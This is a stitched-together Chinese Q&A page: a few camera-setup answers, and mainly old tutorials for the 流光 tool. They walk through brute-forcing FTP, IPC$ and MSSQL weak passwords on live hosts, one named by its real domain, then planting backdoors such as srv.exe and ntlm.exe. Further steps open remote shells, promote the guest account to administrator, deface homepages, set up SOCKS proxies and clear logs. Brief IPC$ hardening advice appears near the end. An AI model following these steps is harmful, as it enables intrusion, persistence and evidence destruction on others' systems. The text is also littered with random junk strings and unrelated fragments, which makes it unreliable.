ipc教学
『壹』 康佳智能蛋kipc1000连接教程
摘要 稍等一下哦正在为你查询
『贰』 康佳智能蛋kipc1000连接教程
摘要 您好!很高兴为您解答,请稍等我先看看问题,整理问题答案!
『叁』 请问流光怎么用
流光教程
流光教程一 ON,Z$G*^ m*U
许多新人在用流光的时候不知道如何下手,小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 :),就抽了点时间写这个简单的教程,希望让新手快速入门。 $Xn3l E&e M'fl7I
h4r3|)V"S&y
我个人认为流光的破解可分为5大部分: #?c"J4l'uL;Mum
nZX'vd;E3D4{+A6g 一、POP3/FTP/…探测
Y D Z"Aw9e
N z*l6A8nuxjAZ 二、IPC探测
+v8} ]2i X r3{V ~7cNNZi:W2u
三、SQL探测
0b*[1x8g'U #}??}8Hx8O
四、高级扫描 4v`I'\ D\Z
?\)r+x!e-q)j bf
五、其它 … 9FZ%J-tE6c(}+N8v
Q H^@4VX'p 因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:) Z:X%?#a+y A&V
6JO v+] f9jS,m x 下面我就简单说一下基本的破解流程: $~S @O%r2D
z|+|)qsq BC 1、你得有流光,我这里试验用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G
Q a:x7c.Kf4u 首次启动流光,看到如下图的界面: :x2jWr0nJ+x
"d)zkP!\ h$a ]|&Q0uro
X-U9[zO"k;M
首次使用是要注册的,不过不要想到花钱:),小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项,然后点发送即可,如果发送失败,你把发送服务器换个就好了。
1Dy*^7CM4y4jj7BA )[sRpa7_/w
S;X j@_H
E+U4xtR:@5EYt/CJ)}
因为重装系统,我也不知道我发了多少次了 :( 。如果不想注册,就稍等下面的进度条走完,点稍后即可。如上图:
y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L
tN;FQDgH-x -s(Z5w5FEr@p[
H9ed$^"N[*P"X .A$}Vtx6q2sJ
2、找个站点,我选的是中华网[url]www.china.com[/url]的主页空间(home4u.china.com),探测方式:FTP。
N |B^Fk4Y +I V+X lf
有人常问扫描端口有什么用,其实作用就是你知道他提供了什么服务,然后可以采取相应的探测方式来获得PASS了:)我们知道主页几乎都用的FTP上传,我们这次就用来测试一堆用户名,看看有没有弱智的密码,呵呵,如果有 hacker.at.china.com 这样的,也不妨霸占为己有:)
4n9N OnqZkd
7W NmEQ5ZHw 3、加入要破解的站点名称:右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定! \:] B E'MGw
mZy9yF:qpE8K eJ5L!I a#C4I1O*w
yU&CX#X$x,r
CrN Ap
!zS,@}0m/P,V7} 4、加入用户名:我们要破解的是一堆用户名,所以要加入用户名的列表文件!我们就加入流光目录下的 Name.dic :)右键单击刚才添加的主机:home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开
;g$d.k H-W 5itXRHu%?8G
7_bvg'fU
C&@2H W,]S NO%yOw-Y.\*E x hJkB6l
1l;v0{`!~d+e%hU u
然后会有“用户已存在列表中”的提示,我们选中“不再提示” → 确定 。如下图: 6A ~:uu X3eh
$G7Z%~ nw
wVF5^tB#yT#k%Nf7c
CkjR-X[_@-b 用户名太多,我们可以用点主机前面的“—”号把用户列表缩起来,如下图:
+l3^8TC0R3Ml
7Q,FP oe`"[mk Z-m1x^kB8j$Ej]
!V8WoCEr
大家注意名字前面的小框中必须有√要是没有就无法探测了。 Xcj)[ PR
\JL,X5W Cv Lv o3G
5、有了用户名,我们就可以进行探测了,大家会想到怎么不用密码?其实流光有个简单模式的探测,也就是用内置的密码”:“123456”和“用户名”来进行探测,因为这样的密码是使用频率最高的:) 9r)?e b;M4Y5y#pixy
{M JrO#j@Hmg_ 当然你可以修改这个简单模式的文件,加入你认为弱智的密码。方法是:单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘! OQhI^,O
F Q_~.k ODI 下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。
}S~5M{)E
EbUz RqHZ 探测 → 简单模式探测!
u$b'n(jR,Ik0h@
b(P*|@-s,U!P;uO.{ hm.T2l*t},|
T ]q&I2q~
3F_(W(C j?\
M s+q O3L$s 探测中…
:fJ+A;T@S}&u
y+g.Bl C-_6x"U@X+M1]B
$k.S*q!g.] X
K]e/y^Ii
:]^YE/A$fB#W
1M+]t+eW QAM 6、探测完毕,也看到结果了,流光会问我们是否查看入侵检测报告,不想看可以选否。
*sQ!cR:C'oms
;w I`&x+y
|I)vh7?xc|
;Hga+B5r:vt#Je 报告的画面
2z)S"nS @l4~#VM
ydx!w*O b| {?Cb1ZDZ
\.i c`h xc 7、如果要探测的是一个用户名,就需要添加字典、或者密码方案。方法是:右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。 ]}E5? J l/@
J$``IO#R3i 以上就是流光的一次简单的探测了,事实上这些功能只能算是流光的2.5版的功能,流光2001增加的IPC/SQL/高级扫描等功能,使流光更加强大。如果你对这个已经很熟悉了,相信你看流光的HELP就会很快的学会其它的使用方法的。
9\W i R-JUV j {L k/X |
关于用户名的问题:有人觉得自己加入的用户名不一定存在,如果不存在岂不是白费了力气?这点你大可以放心,流光会进行验证的。而且现在注册的用户入数之多,想个没有的名字都难,不信你随便敲个试试。
Vi~PLWdY UYk5@Ou
关于字典的问题:流光可以使用字典方案来探测,当然你也可以生成字典,有的新手在作练习的时候不知道怎么做,你也可以用记事本生成,每行输入一个密码,存盘后将扩展名改称.DIC,流光就认出来了:)如果你连扩展名都不会改 :( 那……
wp-w7J"Ga)\af+p
L/\Di/`@y X#c
2a2H~/f9W[,L o r @m F ~
只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
]J+|3{,mJ-k#j!M
0W H%X$sp/@ a
u3I4L%S9n btd
P#m)Zqs
`1_s"W)BD :c"{n_&r]
待续……
香烟 2007-5-28 11:07
流光教程二
很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(
l P8M"F5M:b2|0k !J:Ix~R h
你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。
{B \[y0x\/u 'a+g a S)tUc
交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。
R p4O)Z'qT#L n.Wxu3Zk0x
5F i GX!xJL+Z#`dN
今天要写的是流光的IPC探测: \,`;P_`?
Ev b n+jq 一、目的和任务: +@&g2Bs/dp+i
M UA0P@ O;t pu!?DP
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
V |nnP;_gTX] 2、学习IPC探测的相关知识。
!gnaW4v,Ft9~ 4X-R0J'U:\ |td
二、探测流程:
E],@9y/b Bm#a~ S8HD#?%X
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/
X.Q#mG"Vj^S }+T!J (U:s,o|P1F\I2p
2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
+DfdoX;})J (~\Q.` v \&|7\3o
什么是IPC:
l2E6WK0@4b^
d,d-Txkrx!miLM IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 .p gsh Y_E
S#M+Y+c^+\_|
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 (nV6s7f4k
RE u*@!T 注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 g/?"o[;We AvE w
2\"D,R+t6u;z $s e5mP6@^5v7t
:s#n8[q4rA g
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
#p"U`9F9v8lv,P
xK8X$rAm k{8K*G7q5R
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC
sI)[at
M9ly3t p 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得 A:q6EkB5_v
nLa5Q*pxL
到弱口令)。
"S[;hr4]W)@
9Q$?5X4w(a 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
u ~ ]` W6C 图main1 4H%SmP u3`-g
7\0v7S7S^ue
+k.h]7}vr4A*| "B^;XKZ0L;R"_-H
图main2 Qmm _ Lh7GV
-XCq2S~ cQ
EG"miTgi+u
6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 k3P.gQ$p
.ZA F#w X 4、探测中…… (start1) %_,sn#G;q3Y`
!Gv?@G;t0|1t_D
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 6rb2ZLn9n'?3F
M.KoJ2c
!dnP6me;D%C iCBt)hvs!bm)v
6e(JmneR 5、这是扫描到的NT/98主机列表:(jg1) 9yd R9V @c E G
4z zC1Kn9GOP ?
1sa _W Om9l
'U0x?U mk ^2G5j
6、没有扫描到常用密码:(
2\"r'i'kA&n;o 6KgORI"y t}-T$J
HfegS j c,o9v*LQ)K:F
7、就不要查看报告了 :… &e2N(Ki,t \&WM@FO
} z'p-S%yYu4W
WU9g._w/S5A
\:kr_8_7gA)A 8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。 $P8E]3\9B K2pg
AP#[(N W5P4Y
%n)T h9qO&[k"U3y P Xe
)g2tM"l-^)A.s8N} 9、注意下面两个对话框的设置:全选上,我们只要IPC$管理员的弱口令。然后点选项
Y i:~C{DP Nzy _x3wxL
(C0M4X W@vO
"mx-?qz]%n4z 10、点“选项” :为了加快弱口令扫描速度,这里的两个我们可以全部取消,比如下面的那个,如果对方禁止列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微。 T1@+Z\q _'xbU
3U+n)L1?1ZHE0E
?]*\9K5\6{4o2{3a l8_W
-~K+d6^]%w mg x1_fw[
11、探测中……
L|9Wl/`9i!w
iX5~o5y"E C+@ /l8f#OxW:@Q
FL?HKg/vQ
12、有密码了:) vh3tv/zll,p
xm;{Z r+L3{~"k
y1pg2x l z:P l(f6y2[2vSY;K,]
13、又出现了查看报告的窗口,看看 :)
#Y0U fH M@,@Tf x
@^%Z0v(t [| 9m-`)X-P(Q#o,I
C8E [,F W
14、有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办法么? :)有的是 !自己看看工具- i:h0{(AGCO5O
H.j+f!X;Fp8o 菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
}6Pb \+u W#C %V%`*@$m*u"pH&P
15、黑了他 !
w2K#cu"e}
@2]*w5d.Y+V'D8bB 开个dos prompt 执行如下命令,本次用的例子如下图。
1v'kePX4a-r
)z9N,s5hb-AaH_ 1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接
6sBdD1z3l p#T(o_p5ve+PSqC
2、 icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 :) 这里文件多。
*Q1T*l,e"K%_/E
-Pr:z%mOn/L 3、 net time file://对方IP/ || 看看对方的本地时间
{7J{ H.|:f!oy Q\M
R g;Yi}x+tO1j&_ 4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
Luw UB @)L2~fy S0@lz
5、 telnet 对方ip 端口 || 1Q&LR1Z3W/h }
{K9x J4s-U(K%C-_*c
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
8Hv3k?)um1o@~`[ QF@G~%gZ8jF
7、在开个窗口,继续 我们用的东西。 sock.exe ntlm.exe cl.exe clear.exe 1p"?+X1LN$K~4k
za1\5E[:?:j5f
图cmd1
-MRgW,~F/cx
q\&Vh |,P #o&n8N/R` l%RB
9O2i,ZZ ~/~,b kA%c4f-h!v Q 图cmd2
Nl#I\*s E V
Ui HR"C%X
;L;\#~A-g])_$o
Z(G;iiC 如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
%\YUsC5z2th2w j2WwPs*C:@
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样: default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M
_s8c8P\B K
下面的图有演示 t2~5l:i'v,j
.T'l!h)XGK_-FN^ 7、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:) /S.S,_? ^"L-y
F&D(HL ^ 执行我们 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手的那堆东西 :)
Gk,Q@ X"n\m us E
} ^\W(a G V,S
Y1aU j9t ^/n[7K
6Z`!q!Dx-W\ 8、做个SOCK5代理玩玩,用在QQ上不错喔: cq&Q `k+h8m
1G1}lX'S(F
执行我们 过去的sock -install,net start skserver 看看用在QQ上的效果:)
1C.P7F6?"mY
[7D&n&l|@
*b wh ?}1O/SW
0s(r2G:K9_A\kB/iw 是不是没有看清上面的步骤呢? \$u1Ll]qJ,\Q(e
1QG2S/zq4_0DK wN 下面是我telnet 上去后所有的命令:)
M)M k|.Z $me*bZRZr
0c0Zw8X7}I
$pF g1^.A 9、还能做成其他的么 ? yLP4s#w"\5i4|
/}2}H6h!jc/|o;A
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
A&b!W2`My^#v
5Lj} O`qG 10、日志清除,断开连接 : dB#Va F~w f
"x)Op(r[`9D
执行我们 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use file://ip/ipc$ /delete
FNwL3v
4J$lx'Xztp 这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 'rKIh8G V(V
$F&tj+\W6f
在网吧写完 :( 错误之处请赐教。 ,f^#B#yg3u J#q
&u;Y/q~3hN A~ 只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
香烟 2007-5-28 11:08
流光教程三
关于IPC$的终于写完了,那个该死的网吧,闹哄哄的声音声声入耳 :(,你可能想不出,IPC$探测是我在网吧完成的,而且那个网吧还有公安部门的网络监视器,这东西很有意思,好像是VXD调用,和IE运行库集成到一起的。哪天非弄来研究一下,说不定一款别具特色的木马就问世了 :) PY{ S+Fy!Yo
%J@2J!QlVW7u;A
不知道你看完前一个教程有没有要扁我的想法。。。。
zv'y;w,\!msU
R7dr8gLWpd 交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。 jN;d|C c%|]
\#O"o7Nd
+ER[ x`v'r 今天要写的是流光的SQL探测,顺便说说ipc$补遗和其它的探测手段。
sI!\~*F3~
hmw.N Eer-Ca+t 一、目的和任务: 1Z%CUh!v:@i DZ
/]a E)Z4G#].e
1、用流光的SQL探测获得一台NT主机的管理权限。 dU/[-d9JI'k
2、学习SQL探测的相关知识。
^q$f5F k o;d qJ 3、IPC$补遗和其它…
$n j6n$V yl 二、探测流程: ,y?8gzw)l
,F7ajG@:[ 1、你得有流光,这话不用在说了吧:) rcHF&O4w|C
Ny|f\X
什么是SQL:
2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r
SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间
7K$e.k Jbp (wi4PW6s9pU8e/C*H
去看看SQL的联机手册,说的很明白。
&W8A4of)?)t)U
'?c3QW@.k#Dh@*Ll SQL服务程序支持的网络协议: Nl*`yf ?
.G0y)?F,R$`rH Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。
YB5I7`ME E9v4D
-If}ru \ IP Sockets :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。
:b3L{~-S Xl6}E!]2c o3C]
Multi-Protocol :客户端需要支持NT RPCs,数据加密。 4T7f3e?{1`[a
JJq(S:o9`\,nk
NWLink :存在被SNIFFER截获数据的危险。 5{/AhH3_F jv*LM
%^3qxM8h:\qZ `W!y!m
AppleTalk (ADSP):存在被SNIFFER截获数据的危险 v"t3N"e DZx
7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截获数据的危险 :t k6Z7RZ;W~
Bkh{3_/y9k7D p
在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口
;MA'vxIjn.L"V7E
([Z8u)b[1N)l[xjf
vI'Go'}dF E q.j 2、我们要获得SQL 主机的管理权限,那么还用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
Hz W2VB"Pq
.~8U6@/\?H:{ 对一台固定主机的探测等我下期的教程:) WUTp!~-M:K
s)XZh4Lz
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@
图main g;S:]_4M$^
)[MQp j
V_0@sF~
$yX0tZ;TX'l(u(b
I0i)Q2cu2iv/ul
3、出先了下面的小窗口,输入我们要破解的IP段,我们输入了来看看。(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现“地址保留的信息”)
iO~/qo|p4\ 图inputip
@,l6S/mi6p ,S4^XK-rb
W7i}tF,?` H B j1jWF:~|;MV
%{]-Y;`(wR-[cn 4、探测中……
5hB-u.aXGA Xb
bm!hl]-Kn|1F5B 5、有密码了:) 图psss 1→3 &I*Xett-^ wY+d:N(Q
`,Te`#p` yc2EJ*i7x%|Qu'e
t:` V9^]
Ee+x-va;W ]F
6uR8p)Crk5\7?
aH0cgLClEGp9I
*{(S&hN:n
2H]6I3xJ4V | ip#^/H] My-I g7Z
6、下面我们进一部获取管理员的权限。 4b.RQK4L
用SQL 客户端去连接主机,没有装SQL :( ……………… 没关系,流光自带了连接的工具,以前我一直都是用的天行的工具SQLexec,但现在可以不用它了。 A d-i9MC3O!oZ1g
R`s AB$u@A
打开菜单 工具 → MSSQL工具 → SQL远程命令看看:) f8jZ]/J
图tools
| q^%g{$H|8p6~
D~ fE/Yj'Hyy G4k#X,br(h
+sjL t+N ]j 图SQLcmd 7`;^3d4Kd&Wt\4ir2a
@0|#Zh*I`"U
2^M*O8rLD
zL$n*Gl 4nsB*l+?X
7、获得管理权限、增加后门
s+Ex MD&zj*y(N 图cmdline 6R^ {.HtkOe g
5x%G7L_ z;LM A
L0Y?2b:sy
8HNh#wk.f
0f-}8s(Z%Q gO
{9Rhd aD 8、现在我们已经是管理员了:)
3l"eM1G(e.?(U { y.M tn
以前我们是用at命令来远程运行程序,今天顺便说说流光中自带的“种植者”,看看 工具 → nt/iis工具 → 种植者,我们来用它远程启动icmd这个后门。 xW9{5d lp
4o@7Fi.O5Mt{
图lookcrop 5q l.c.nM6k
&H V} g.e}_O
oS8D'l&L
l e9G1a~(wy
图crop &V8XM;u }\0t%_Sd
{j qEC#?Lc/W
)\$_;k,u-K
H(P1e)G;a7E 图cropend d'VHG6@yu
m*XX6A$b N fe3A9u%B]Sk
-VLFBb*N 一分钟后登陆看看:
2@'zrwIB.z b9f]V4V/Ys"q#gr2H
-L-e)L,m yQG1?c
@x3A)}U$I%k1mA
.Y,EMOF
6QNC4w6rs't
7O2l(X;TT;bQp
9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。
0T:s(_)^CdaQt
3}.YUYvi)g8N 图mode U k/d&bcw'e4m
Da \[ j;^2m
8eQI H3er!\$R
H-QJ/njtF#c
#v(HkA%{,I9E
@i/V5V`u&o “工具”中其他的项目和上面说的两个类似,就不多说了。
:AL A"sF)g\ H2K
8{7e(z[(~0j']zF v
#Rn3O${]&K"h9v NR 10、日志清除,断开连接 ,参考IPC探测,记住可以用种植者远程执行命令。
Q]d%H Q Of5b ot-m mFnM8a#Cv3A
!oSO.LF|
关于IPC$补遗:上篇对与IPC$探测的文章,写完后觉得还差点什么没有说:) T)Rlz*v#@gC
b8n2^,y}"Ui1` 1、我们虽然只探测管理员(admin)的弱口令,实际上在真正攻击中是任何一个用户口令都不会放过尝试的,因为我们获得了
E:mJ O#P0M,^EAJ !aF C??5k!qh9CH
普通用户权限后可以提升权限,事实上,一个普通用户的权限在*nix攻击中是非常重要的。 lCkc)W@m
MN0f:GT%x
2、获得口令后,攻击手法多样,不要局限于我的例程。
XJWu+Q |/U5B/Ffco
3、如果对方没有XXX怎么办?,这类的问题去看看我以前整理的流光FAQ。 v!D+RH z K
'K;t{"S(a?rM
关于其它探测:
O)},m1]u A1J
]6H {0^7C$?U 玩玩3389 ? Lxk8[l8F
Dc?~'^#mQ/c3L l
首先终端是WIN2K提供的功能,所以我们在扫描的时候就要选择 “NT/98”的主机,在得到主机列表后自定义端
4]vE0~ b/o CY
6J:XH WY{AN"qu 口来扫描这些主机的3389端口,然后……
7ED.O4CM/]NZ 8l3m-J9x'?*B
玩玩cisco路由器? Y'}L4[x-}:qt
&|7l5x\;nm 自己想想怎么作 ?要是想出来了,我的以后的教程就不用看了 :)
4?` [wxXB"o/}~ y!GGM X}\(H:|'`
1_h(r5b"V1E3ht]%j
G6RK^XE-u 明白了么?我说的意思是要灵活使用流光:)
『肆』 海康威视网络摄像头安装教程
经过很多机器视觉的熏陶,终于决定开始学习计算机视觉,于是入手了海康威视的一款半球形网络摄像机,那就开始整吧。
好嘛,由于是二手的网络摄像机,拿到手里时只有网络摄像头了,怎么办,好慌,没有说明书啊!!!然后各种网络、知乎。找到了一片海康威视的网络摄像机连接、使用方法。
CSDN-专业IT技术社区-登录
按照教程步骤,下载了SADP软件,网络摄像机和电脑通过网线直连后,打开SADP软件,刷新界面,好嘛,问题又来了。
设备查找不到,怎么办,要不要放弃???
网络、知乎找了一大圈,才看到是不是网络摄像机没有供电啊?
什么鬼,我入手的只有网络摄像机,哪有充电线!!!然后我就问卖家,你怎么不给我发充电线呢?我要给你差评。估计店家对我这种刚入行的小白也很无语,店家说,这个设备没有充电线,网线供电的。我心你个鬼,我试了没反应啊。然后我将后面的条码拍照给他。
店家说,确实少发了,不过这个网络摄像机是POE供电的,不是POD供电。???
什么是POE,什么是POD,我好方。
然后就邮寄来了一个类似路由器的小东西,不过没有天线,好像叫POE交换机。
我就把POE交换机插上电,一个网口连了网络摄像机,一个网口连了我的电脑,顺序是有要求的,要不然SADP识别不到。
终于,SADP识别到了我的设备,额,怎么和教程不一样,设备怎么自动激活了?
不管它,继续下一步骤了。
下面就到了更改我的电脑ip地址了,没错,坑又来了,插上电脑后,我的电脑竟然显示有4个以太网连接,差一点就砸电脑了。
然后我就看了每个以太网连接的名称,排出了两个虚拟机以太网,还剩下两个,好嘛,我就把它依次禁用,我看看那个对它有影响。好了,终于找到对应的以太网了。
按照网络摄像机的ip地址、子网掩码和网关,把我电脑的ip地址改好了。
马上就要成功了,开心的去买了杯咖啡。
回来后,用chrome登录ip地址,怎么需要登录帐号密码?店家害我啊,有没给我全部信息。
店家回复到,密码我也忘记了,我用的时候就是二手的了。。。。
我入手的竟然是三手货。。。。
好嘛,浪费了那么长时间,没任何卵用。没办法,网络呗。
然后我就发现海康威视客户服务公众号里可以更改密码。
输入了一大堆个人信息后,又是下载软件,又是扫码,终于重新找到了密码。
然后我就用chrome打开了ip,登录到了海康威视网络摄像机的页面。
怎么不用安装插件?和配置信息说的不一致啊。配置信息在页面可以看到。
然后查看了他的说明,好嘛,chrome不支持。
那就换ie呗,这次终于要安装插件了,好嘛,终于有画面了。
还有点小得意。
录了一段视频,保存文件竟然放到C盘了,这怎么可以忍,我就一段操作把它保存目录更改了。
返回主页面,竟然不能采集视频和照片了!
然后又是一顿网络、知乎。找到了原因,竟然是ie自动保护功能,还有这么高级的操作吗?ie666.
以管理员身份运行ie后,再次更改保存目录,终于可以正常使用了。
海康威视家用网络摄像机C1
操作方法
01
第一步:需要将监控摄像机通电,将监控摄像机与路由器LAN接口直连。所有的连接工作已经完成,下面需要打开笔记本查看无线路由设置,确保路由器DHCP与UPnP设置处于开启状态后,第一步准备工作圆满完成。
02
第二步:用户需要输入shipin7网址,进行用户注册,此时,必须与手机绑定,这样才能便于报警提示功能。根据提示下载插件后就可以添加摄像机了。在确认摄像机连接正确的情况下,可直在局域网内搜索出该设备,或选择添加序列号均可实现。按照操作步骤填写验证码等完成连接。
03
第三步:其实在这种情况下,摄像机就可以正常工作了,但出于家用监控,凌乱的网线与路由器直连存在很多局限性,因此只需要通过扫描无线信号,输入对应的wifi密码后,就可以实现无线连接。密码保存成功,拔掉网线会有短暂断网现象,但5秒后又可以恢复监控模式。
End
特别提示
简单的操作页面与连接方式,让更多消费者看到了未来家庭监控的趋势,一线连接、一键布防。这款监控摄像机设计目的,并不完全只考虑安全层面,更重要是沟通,如何通过监控摄像机与父母联络、与孩子互动、与员工沟通。
『伍』 康佳智能蛋kipc1000连接教程
摘要 下载智慧沃家 APP
『陆』 求IPC-7351 lp Wizard 10.5下载地址和使用教程!
10.5版本的软件下载地址,(网络网盘添加以下后缀,不用教怎么做了吧?) /s/1cJT4a6
视频地址,目前还只有1讲,同样的网络网盘加后缀 /s/1eSjT7oA
『柒』 ipc$入侵教程终结版
如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
十 总结:
